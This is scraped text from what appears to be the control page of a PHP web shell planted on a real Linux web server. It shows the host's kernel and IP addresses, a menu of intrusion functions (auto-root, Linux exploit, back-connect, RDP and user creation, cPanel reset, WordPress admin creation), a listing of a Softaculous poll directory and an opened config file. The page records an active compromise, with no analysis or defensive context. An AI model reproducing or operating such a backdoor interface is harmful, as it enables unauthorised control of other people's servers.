Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.226.17.3
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
advpoll /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
3.84
KB
-rw-r--r--
config.inc.php
709
B
-rw-r--r--
edit.php
4.21
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
194
B
-rw-r--r--
import.php
3
KB
-rw-r--r--
info.xml
1.27
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.66
KB
-rw-r--r--
install.xml
2.03
KB
-rw-r--r--
md5
1.63
KB
-rw-r--r--
notes.txt
227
B
-rw-r--r--
upgrade.php
2.52
KB
-rw-r--r--
upgrade.xml
294
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.inc.php
<?php /** * * MySQL -> class_mysql.php * PostgreSQL -> class_pgsql.php * */ $POLLDB = array(); $POLLDB["dbName"] = "[[softdb]]"; $POLLDB["host"] = "[[softdbhost]]"; $POLLDB["user"] = "[[softdbuser]]"; $POLLDB["pass"] = "[[softdbpass]]"; $POLLDB["class"] = "class_mysql.php"; /* tables */ $POLLTBL = array(); $POLLTBL["poll_config"] = "poll_config"; $POLLTBL["poll_index"] = "poll_index"; $POLLTBL["poll_data"] = "poll_data"; $POLLTBL["poll_ip"] = "poll_ip"; $POLLTBL["poll_log"] = "poll_log"; $POLLTBL["poll_comment"] = "poll_comment"; $POLLTBL["poll_user"] = "poll_user"; $POLLTBL["poll_tpl"] = "poll_templates"; $POLLTBL["poll_tplset"] = "poll_templateset"; ?>
Close